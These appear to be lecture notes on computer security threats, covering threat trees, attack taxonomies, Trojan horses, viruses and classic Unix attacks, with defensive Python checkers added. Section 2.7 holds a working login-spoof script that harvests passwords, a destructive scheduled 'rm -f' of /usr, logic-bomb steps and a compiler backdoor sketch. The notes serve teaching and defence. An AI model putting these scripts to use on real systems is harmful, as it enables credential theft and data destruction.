
Chapter 2

Threats To Computer Systems


2.1 Threats, Vulnerabilities and Attacks

  • Threat:

    • defined as any potential occurrence, malicious or otherwise, that can have an undesirable effect on the assets and resources associated with a computer system

  • Vulnerability:

    • some unfortunate characteristic of the system that makes it possible for a threat to occur


  • Attack:

    • some action taken by a malicious intruder that exploits one or more vulnerabilities in order to cause an existing threat to occur


2.2 Types of Threats

Categorization is needed so that a simple framework can be established for understanding and solving security problems

  • Three main types of threats:

    • disclosure threat

    • integrity threat

    • denial of service threat


2.2.1 Disclosure threat

  • This threat involves the dissemination of information to an individual who should not see that information

  • The information may be in computer storage or in transit between computer systems

  • unauthorized disclosure of information is called a “leak”

  • particularly important for organizations that depend on confidentiality, such as the military and government


2.2.2 Integrity threat

  • This threat involves any unauthorized change to information stored on a computer system or in transit between computer systems

  • for non-critical information the consequences are minor

  • for critical information the consequences can be disastrous

  • particularly important for battle plans and commercial activities


2.2.3 Denial of service threat

  • This threat arises whenever access to some computer system resource is intentionally blocked as a result of malicious action taken by another user

  • critical where timing matters, e.g. delaying weapon deployment or stock dealing

  • because the affected services are characterized by their timing, this threat is more difficult to address than the others


2.3 System Security Engineering

  • To deal with the problems of threats, vulnerabilities and attacks, a new discipline known as system security engineering has recently emerged in the security community

  • the security engineering process (Fig. 2.1) involves understanding the security problems and deriving protections against them


Figure 2.1 System Security Engineering Process: Specify System Architecture → Identify Threats, Vulnerabilities, Attacks → Estimate Component Risk → Prioritize Vulnerabilities → Identify and Install Safeguards; the cycle repeats until the risk is acceptably low


Specify System Architecture

  • Inspect the system

  • examine the network, host, interface and other associated architecture

  • use a structural specification that includes the current security methods in use

  • include a description of functional properties

  • create a security priority list


Identify Threats, Vulnerabilities, Attacks

  • Identify potential threats from internal and external sources

  • estimate the possible damage arising from an attack

  • establish methodologies for minimising the possibility of attack


Estimate Component Risk

  • Develop a risk formula

  • Identify risk components

  • Prioritize risk factors


Prioritize Vulnerabilities

  • Based on the risk priority developed in the previous stage

  • this stage provides an order for installing security protections

  • since resources are limited, the highest-risk components are dealt with first


Identify and Install Safeguards

  • Identify all possible safeguard approaches, including standard security mechanisms

  • the safeguard mechanisms are examined

  • consideration of minimal impact, performance degradation, cost and resources is needed


2.4 Threat Tree

  • High level threats serve as the starting point for further decomposition

  • threat decomposition is based on a threat tree

  • the military standard MIL-STD 1785 is used

  • a threat tree is similar to the decision trees used in risk management and reliability engineering


2.4.1 Arbitrary Threat List

  • Threats can be identified during system design or development

  • they can also be identified by a random, unstructured process called the arbitrary threat list process

  • the list can be enriched during the design, development and operation stages

  • However, arbitrary threat lists have some unfortunate characteristics


Unfortunate Characteristics

  • Dubious Completeness: it is difficult to identify most threats completely

  • Lack of Rationale: known threats are identified from past history, but the ad hoc nature of the list makes it difficult to give a rationale for them

  • Possible Inconsistencies: threats can be correlated and co-occur; treating them as independent events means that contradictory and redundant entries cannot be rectified simultaneously



2.4.2 Developing a Threat Tree

  • first identify a list of possible threats

  • then introduce them in an iterative manner, refining the descriptions carefully and gradually

  • the tree structure allows the various threats to be associated in a root-node (parent and sub-threat) relationship

  • this approach provides a rationale for the identified threats and simplifies the security solution


2.4.3 Structure of a threat tree

  • Each tree has a top label called Threat

  • each label contains some generalized description of a threat present in the given system

  • each child node is a sub-threat which represents a refinement of its parent node

  • the repetitive process terminates when all threats and sub-threats have been identified, i.e. the tree is complete


Figure: Structure of a Threat Tree (a top-level Threat node refined into Sub-threat nodes)


Example: Hospital Computer System

  • The Hospital Computer System Threat (HCST) is composed of Patient Medical Information (PMH) and non Patient Medical Information (NPMH) threats

  • PMH can be further decomposed into Life Threatening (LT) and non Life Threatening (NLT), both of which are further decomposed into Disclosure (D), Integrity (I) and Denial of Service (DOS)



Figure: Threat Tree of HCS

    HCST
      PMH
        LT: D, I, DOS
        NLT: D, I, DOS
      NPMH
        B: MDEV, NMDEV
        NB: MDEV, NMDEV


Effects (the NPMH threat is decomposed into B and NB, the billing and non-billing threats; both are further decomposed into Malicious Developer (MDEV) threats, i.e. those introduced beforehand by a developer, and those that are not (NMDEV)):

  • D: confidential patient information is disclosed

  • I: patient information is corrupted

  • DOS: patient information is not available

  • NMDEV (B): billing information is corrupted

  • MDEV (NB): internal schedules are compromised


2.4.4 Using Threat Tree to Support System Security Engineering

  • A threat tree provides a structured means for documenting and organizing the estimation and calculation of criticality, effort and risk factors

  • Criticality (G) defines the impact of the threat, or equivalently the gain obtained by introducing security measures against it

  • Effort (E) defines the resources needed to resolve the threat

  • Risk (R = G/E) defines the normalized impact of the threat if it is attacked


Example of risk calculation using (G,E,R) values and maximum risk selection: each leaf carries (G,E,R) with R = G/E, and each parent takes the values of the child with the highest risk

    HCST(8,2,4)
      PMH(8,2,4)
        LT(8,2,4): D(1,1,1), I(5,5,1), DOS(8,2,4)
        NLT(2,2,1)
      NPMH(2,1,2)
        B(2,1,2): MDEV(1,1,1), NMDEV(2,1,2)
        NB(1,1,1)


2.5 Categorization of Attack

“Computer crimes are probably the tip of an iceberg - but just how big the iceberg is, no one knows” T. Perry & P. Wallich

  • Traditional three classes: disclosure, integrity and denial of service

  • Unclassified attacks: internet browsing, computation, storage and so on

  • To account for specific types of attack, taxonomies are used


2.5.1 Using an Attack Taxonomy

  • An attack taxonomy is defined as any generalized categorization of potential attacks that might occur on a given computer system

  • attacks can be identified by informal analysis, documented by analytic means (such as a threat tree), or drawn from reported experience with the target system


  • Attack scenarios are sometimes identified for certain classes of systems, including real-time, database and LAN systems, and they must be dealt with appropriately in the target system at an early stage of security system development

  • Precise determination of the system and attack characteristics, together with their interaction with the environment, subsequently yields the final attack taxonomy by reducing the set of known attacks


Figure: Using an Attack Taxonomy / Reducing Known Attacks. An attack taxonomy (many known attacks) is applied to the target system to obtain the attacks on that target; attacks are selected and mitigated in repeated rounds, leaving an attack taxonomy with fewer known attacks


2.5.2 Considerations in Selecting an Attack Taxonomy

  • Completeness: the categories of attack should be accompanied by evidence that all potentially unfortunate occurrences in the target system have been accounted for. The attacks must be justifiable. However, since most attacks are unstructured and system dependent, empirical evidence is the strongest justification for completeness in an attack taxonomy.


  • Appropriateness: the selected attack taxonomy should appropriately characterize the attacks on the target system. This depends on assumptions such as whether malicious insiders are present. A tradeoff is sometimes required between common, highly appropriate attacks and less appropriate attacks for a specified target system

  • Internal vs. external threats: an attack taxonomy should differentiate between attacks from insiders and from outsiders. An external attack taxonomy is sometimes entirely unsuitable for insider attacks.


2.5.3 Example - Simple Attack Taxonomy


2.5.4 Example: Risk-based Empirical Attack Taxonomy

  • A simplified taxonomy cannot cater for the actual situation; an empirical taxonomy with reasonable justification can be made more complete

  • Possible empirical attacks:

    • external information theft (glancing at someone’s terminal)

    • external abuse of resources (smashing a disk drive)


    • masquerading (recording and playing back a network transmission)

    • pest programs (installing a malicious program)

    • bypassing authentication or authority (password cracking)

    • authority abuse (falsifying records)

    • abuse through inaction (intentionally bad administration)

    • indirect abuse (using another system to create a malicious program)


External Information Theft

  • an unauthorized individual steals information, or glances at another person’s terminal, to obtain sensitive information such as passwords, salary data, confidential documents and so on

  • Avoided by external procedures such as a secured terminal room, a secured printer, or paper shredders for discarding sensitive information


External Abuse of Resources

  • This involves physical destruction of hardware such as disk drives, circuit boards, communication media and so on

  • Because this is an integrity attack, the attacker must have physical access to the physical resources but not necessarily to the internal resources

  • physical destruction may include vandalism or switching off the air conditioning or electrical power

  • sometimes the abuse does not damage the hardware, e.g. jamming or tapping

  • Avoided by introducing physical security measures such as locks, guards, surveillance cameras and so on


External Masquerading

  • this involves a malicious intruder successfully impersonating another user using some mechanism external to the computer system

  • examples are: tapping a communication medium, recording the information transferred and playing it back at a later time

  • this attack has been used by network hackers to avoid being located

  • Avoided by setting up proper network security procedures, but the techniques are not straightforward


Pest Programs

  • this includes attacks that are set up by malicious individuals to cause subsequent harm

  • a pest program can be viewed as a time bomb, i.e. its effect occurs at a much later time

  • this time lag may give the intruder the opportunity to cover tracks and avoid being caught immediately

  • well known types are Trojan horse and virus attacks

  • Countering pest programs requires secure internal controls, awareness broadcasting and possibly some shield programs


Bypassing of Internal Controls

  • this involves the explicit avoidance of controls that are set up to protect the resources on a computer system

  • Bypassing usually refers to authorization, access and authority controls. The technique is based on clever use of some existing logical flaw in the system

  • Examples are the well known password cracking techniques that subvert protective approaches containing flaws, and operating system and compiler attacks, which usually involve logical exploitation of flaws to bypass authority


Active Authority Abuse

  • this attack occurs when an individual is trusted to perform some type of sensitive or important function and then actively abuses this privilege

  • Examples: falsifying certain data entries or granting services in an improper manner

  • Avoidance is difficult, but the risk can be minimized by personnel screening, background checks and even polygraph tests


Abuse through Inaction

  • this involves the willful neglect of duty by some malicious individual

  • the attack occurs whenever some action is required to avoid a harmful situation but is not performed

  • an example is an administrator who neglects the maintenance of a system or recorder in order to cause degraded or denied service

  • avoidance starts by identifying all possible inactions; this is the first step for any attack avoidance mechanism


Indirect Abuse

  • this involves an off-line system and is characterized by behavior that may appear normal but is actually being carried out as a component or step in some larger attack

  • Example: factoring a large number on one system as a means of breaking a protection routine on another system

  • Avoidance is extremely difficult because the activity appears completely normal to the system being used


2.6 Trojan Horses and Viruses

  • A well known type of program that can be made to provide self-reproduction is the Trojan Horse

  • when such a program is able to distribute and propagate itself across different computer systems, it is known as a virus


2.6.1 Trojan Horses

  • A Trojan Horse program is defined as any program that is expected to perform some desirable function but that actually performs some unexpected and undesirable function

  • This means that a Trojan Horse program may look like a good program but can potentially turn out to be harmful


Example: cat command in Unix

Figure: the user types “cat x”; in the normal version this invokes the normal sequence of operating system routines, while in the Trojan Horse version it invokes a maliciously altered sequence of system routines


  • In a trusted group, the Trojan Horse is not critical: this setting allows co-workers to share information and resources, and the malicious program will not be created

  • however, if a Trojan Horse has infiltrated a trusted environment and can self-reproduce and propagate, it becomes a virus


2.6.2 Viruses

  • A virus program is defined as any Trojan Horse program that has been designed to self-reproduce and propagate so as to modify other programs to include a possibly modified copy of the virus.

  • As computer networks have become more widespread, the potential for huge propagation has increased and this type of attack has become serious


Figure: a Trojan Horse is created on System A; electronic propagation duplicates it on System B (connected to System A), and manual propagation duplicates it on System C (no connection to System A)


2.6.3 Self-Reproducing Programs

  • A self-reproducing program is the key feature of a virus

  • this feature is created using the following steps:

    • declare a character string that corresponds to the main body of the program

    • print each character of the defined string individually

    • print the value of the array as a defined character string


Example: Self-reproducing program

    #include <stdio.h>

    /* t holds the text of the program body; the slide elides most of it */
    char t[] = {'0', ' ', '}', 'm', 'a', 'i', 'n', /* ... */ 't', ')', ';', '}', 0};

    int main(void)
    {
        int i;
        /* print the declaration of t, listing its own characters one by one ... */
        printf("char t[] ={");
        for (i = 0; t[i] != 0; i = i + 1)
            printf("%d, ", t[i]);
        /* ... then print t itself, which is the rest of the program text */
        printf("%s", t);
        return 0;
    }


  • A self-reproducing program is so critical because it provides the basic means by which copies of a Trojan horse can be produced automatically

  • combining such copies with a compiler allows one to create as many copies of the Trojan horse as one wishes to compile

  • insertion of additional code can cause damage when executed


2.6.4 Typical Virus Operation

  • Malicious intruders can initiate a virus attack by creating a program that does the following:

    • finds a connected system and sends the self-reproducing code via a remote copy command

    • initiates a remote compilation of the self-reproducing code via the remote execution command

  • the process can repeat and affect other systems


Figure: Virus Propagation. (1) the virus sends its reproducing code to a connected system and (2) remotely executes it there; the duplicate virus in turn (3) and (4) sends reproducing copies on to further systems


Example: simple virus operation

    virus:
        while true do
            find_host(h);
            remote_copy(h, virus);
            perform_damage;
            remote_execute(h, virus);
        od;


Example: Internet Virus

  • The first Internet virus was reported in 1988; it was unleashed by a Cornell University student and infected over 60,000 host computers

  • the virus attacked data and the TCP/IP communication protocols and stole passwords

  • the virus was detected and terminated by a team from MIT and Berkeley

  • however, when caught, the designer claimed that he had made a mistake in the programming


2.6.5 Trojan Horse Clues

The presence of a Trojan Horse can be detected by:

  • Suspicious Originator and Distribution: choose reliable software/hardware manufacturers and distributors to avoid suspicious system components

  • Unexpected Size or Other Attributes: if a program’s size or attributes become suspicious, e.g. a slow response time, the program needs to be investigated

  • Undocumented Origin and Experience: a malicious or incompetent source is to be expected in this case
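One practical form of the “unexpected size or other attributes” clue is to keep a baseline of each trusted program’s size, permission mode and cryptographic hash and to re-check it periodically; a program that is not in the baseline at all is the “undocumented origin” clue. The following is an added example, not code from the slides: it runs over a constructed set of files in a temporary directory, and the baseline layout, function names and the sample “programs” are this example’s own.

```python
"""Baseline-and-compare check for the 'unexpected size or other attributes' clue.

Added example, not from the slides. A baseline records size, permission mode
and SHA-256 for each trusted program; compare() reports every program whose
attributes changed, went missing, or appeared without being in the baseline.
"""
from __future__ import annotations

import hashlib
import stat
import tempfile
from pathlib import Path


def fingerprint(path: Path) -> dict:
    """Size, permission bits and SHA-256 of one file."""
    st = path.stat()
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return {"size": st.st_size, "mode": stat.S_IMODE(st.st_mode), "sha256": digest.hexdigest()}


def take_baseline(root: Path, names: list[str]) -> dict[str, dict]:
    """Record the fingerprint of each named program under root."""
    return {name: fingerprint(root / name) for name in names}


def compare(root: Path, baseline: dict[str, dict]) -> list[tuple[str, str]]:
    """Return (name, reason) for every deviation from the baseline."""
    findings: list[tuple[str, str]] = []
    for name, expected in baseline.items():
        path = root / name
        if not path.is_file():
            findings.append((name, "missing"))
            continue
        current = fingerprint(path)
        for key in ("size", "mode", "sha256"):
            if current[key] != expected[key]:
                findings.append((name, f"{key} changed: {expected[key]} -> {current[key]}"))
    # A program that is not in the baseline is itself an 'undocumented origin' clue.
    for path in sorted(root.iterdir()):
        if path.is_file() and path.name not in baseline:
            findings.append((path.name, "not in baseline"))
    return findings


def demo() -> list[tuple[str, str]]:
    """Constructed scenario: baseline two wrapper scripts, then alter one and drop in a third."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "cat").write_bytes(b"#!/bin/sh\nexec /bin/cat \"$@\"\n")
        (root / "ls").write_bytes(b"#!/bin/sh\nexec /bin/ls \"$@\"\n")
        baseline = take_baseline(root, ["cat", "ls"])

        # Simulated tampering: 'cat' grows by one line and an unexpected file appears.
        with (root / "cat").open("ab") as fh:
            fh.write(b"# extra line added after the baseline was taken\n")
        (root / "extra").write_bytes(b"unexpected program\n")

        return compare(root, baseline)


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

In the constructed scenario the altered `cat` is reported twice (size and hash changed, mode unchanged), `extra` is reported as not in the baseline, and the untouched `ls` produces no finding. The baseline itself has to be stored somewhere the suspected program cannot rewrite, otherwise the check inherits the very problem it is meant to detect.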


2.7 Common Attack Methods

  • Password spoof

  • Password theft

  • logic bomb mail

  • scheduled file removal

  • field separator attack

  • insertion of compiler Trojan Horse


2.7.1 Password Spoof Program

  • The first type of attack involves spoofing a user into believing that a computer terminal is correctly prompting that user for login and password information

  • normally, a Trojan Horse program is used to fake the normal login sequence that a user expects


  • Properties of the spoofing program:

    • the attacker gains physical access to the target individual’s computer terminal

    • the attacker logs onto the target system using whatever login and password are available to the attacker (if the attacker is an insider, these could be his own). It is possible to use a different target computer with some procedural change

    • the Trojan Horse spoof program is left running on the terminal for the target individual


Example: Unix-like command

    B1='ORIGIN: NODE whd1 MODULE 66 PORT 12'
    B2='DESTINATION:'
    FILE=$HOME/secure/suckers/fools        # file to which captured logins are appended
    trap '' 1 2 3 5 15                     # ignore interrupts so the user cannot break out
    echo $B1                               # imitate the terminal server banner
    sleep 1
    echo $B2
    read dest
    echo 'login: '                         # fake the login prompt
    read login
    stty -echo                             # suppress echo, as the real login does
    echo 'password: '
    read password
    stty echo
    echo ''
    echo $login $password >>$FILE          # record the captured credentials
    echo 'login incorrect'                 # pretend the attempt failed ...
    exec login                             # ... and hand over to the real login program


Response seen by the user

    ORIGIN: NODE whd1 MODULE 66 PORT 12
    DESTINATION: node/mysystem
    login: abc
    password:xxxxx
    login incorrect
    login: abc
    password:xxxxx
    $


2.7.2 Password theft by clever reasoning

  • Passwords are mnemonic and can be guessed easily

  • First guess examples: spouse’s name, children’s names, pet’s name, license plate number, phone number, date of birth, date of marriage, favorite sports team and so on

  • Second guess example - an easy-to-type keyboard pattern such as “qaql”


  • Last approach - attack on the password file and encryption function

    • obtain a copy of the password file and the encryption function

    • obtain an electronic dictionary

    • create a routine that encrypts every entry in the dictionary and compares it with all entries in your copy of the password file

    • any match reveals a valid password

  • Advantages: the intruder does not need to guess or infer the password directly, and the attack can be performed offline
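The guessing strategies listed above (personal data, easy-to-type keyboard patterns, dictionary words) can be turned around into a check applied when a password is chosen, so that guessable passwords are refused before anyone tries them. The function below is an added example and not code from the slides: the account profile, the keyboard rows and columns, and the tiny word list are constructed here for the demonstration, and a real deployment would load a large dictionary.

```python
"""Refuse passwords that the guessing strategies on the slides would find.

Added example, not from the slides. A password is rejected if it is a
dictionary word, a run of adjacent keys along a keyboard row or column, or
contains details of the account holder (names, dates, phone or plate numbers).
The profile and dictionary used in the checks are constructed for the demo.
"""
from __future__ import annotations

import re

# QWERTY rows, and the vertical 'columns' that users walk with one finger.
KEYBOARD_ROWS = ["1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm"]
KEYBOARD_COLUMNS = ["1qaz", "2wsx", "3edc", "4rfv", "5tgb", "6yhn", "7ujm", "8ik", "9ol", "0p"]

# A small constructed word list; a real check would load a large dictionary.
DICTIONARY = {"password", "welcome", "letmein", "football", "dragon", "monkey"}


def is_keyboard_walk(pw: str, min_len: int = 4) -> bool:
    """True if pw is a contiguous run along a keyboard row or column, in either direction."""
    s = pw.lower()
    if len(s) < min_len:
        return False
    paths = KEYBOARD_ROWS + KEYBOARD_COLUMNS
    paths = paths + [p[::-1] for p in paths]
    return any(s in p for p in paths)


def personal_tokens(profile: dict[str, str]) -> set[str]:
    """Lower-case fragments an intruder would try: each value, its words, and its digit runs."""
    tokens: set[str] = set()
    for value in profile.values():
        v = value.lower()
        tokens.add(re.sub(r"[\s\-/]", "", v))       # 'Maria Lopez' -> 'marialopez'
        tokens.update(re.findall(r"[a-z]+", v))     # individual names / words
        tokens.update(re.findall(r"\d{2,}", v))     # year, day, phone fragments
        digits = re.sub(r"\D", "", v)
        if digits:
            tokens.add(digits)                       # '1990-05-20' -> '19900520'
    # Very short fragments would match almost anything, so keep only 3+ characters.
    return {t for t in tokens if len(t) >= 3}


def check_password(pw: str, profile: dict[str, str]) -> list[str]:
    """Return the reasons pw is guessable; an empty list means it passed."""
    low = pw.lower()
    reasons: list[str] = []
    if low in DICTIONARY:
        reasons.append("dictionary word")
    if is_keyboard_walk(low):
        reasons.append("keyboard pattern")
    hits = sorted(t for t in personal_tokens(profile) if t in low)
    if hits:
        reasons.append("contains personal data: " + ", ".join(hits))
    return reasons


# Constructed account profile for the demonstration.
DEMO_PROFILE = {
    "spouse": "Maria Lopez",
    "pet": "Rex",
    "plate": "ABC-1234",
    "birth": "1990-05-20",
    "team": "Red Sox",
}

if __name__ == "__main__":
    for candidate in ["Rex2020", "qwerty", "1234", "password", "Tr0ub4dor&3"]:
        print(candidate, "->", check_password(candidate, DEMO_PROFILE) or "ok")
```

The substring test is deliberately loose: a pet name with digits appended (“Rex2020”) is exactly the kind of first guess the slide describes, so it is rejected even though it is not an exact match. The same profile-derived token set is what the offline dictionary attack above would feed to the encryption function, which is why refusing such passwords up front removes the attacker’s cheapest guesses.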


2.7.3 Logic Bomb Mail

  • Logic bombs are programs that remain dormant until some predetermined logical condition on the target system becomes true

  • Steps for setting up the logic bomb:

    • set up a command that removes all files (e.g. “rm”) as an edit parameter in the file EDIT_ME

    • mail EDIT_ME to your system administrator

  • if the administrator does not open the file, it does no damage; otherwise all files will be erased


2.7.4 Scheduled File Removal

  • A schedule file is used to schedule the smooth running of programs on a computer

  • On UNIX, the command “at” is used

  • Example:

    rm -f -f /usr

    at 0400 Sunday attack

  • The program is placed in a write-protected directory and will execute the file removal recursively (-f) without diagnostics (-f) every Sunday


2.7.5 Field Separator Attack

  • This attack relies on several technical assumptions:

    • field separators exist

    • a privileged executable program/command exists

    • the actual file name the administrator wants to execute is known


  • Steps to create such an attack:

    • redefine ‘/’ as ‘ ’, so that the pathname “/foo/moo” becomes “ foo moo”

    • knowing that the administrator will use “sysprog” to open the file called “/foo/moo”, create a program called “foo” in an accessible directory. Program “foo” will transfer the administrator’s privileges to the intruder

    • when “sysprog” is invoked, the program “foo” is executed and the attack is achieved


2.7.6 Insertion of Compiler Trojan Horse

  • A compiler Trojan Horse attack creates more widespread damage

  • Normal simplified compiler operation:

    compile:
        get(line);
        translate(line);

  • The goal of the Trojan Horse is to look for certain text patterns in the input programs that the compiler translates, and to insert code at those points


  • Example:

    compile:
        get(line);
        if line = ‘read_pwd(p)’ then
            translate(Trojan horse insertion);
        else
            translate(line);
        fi;

  • The Trojan Horse program may introduce a password backdoor that allows entry into the system using a common password such as “12345”


2.7.7 Simple Attack Prevention Methods

  • Individual Screening

    • check the background of individuals who are allowed to access the system, since they may introduce attacks on it

  • Physical Control

    • secure the facilities with an enclosed environment

  • Care in operation

    • set up security procedures


2.8 References

  • E. Amoroso, Chapters 1-5

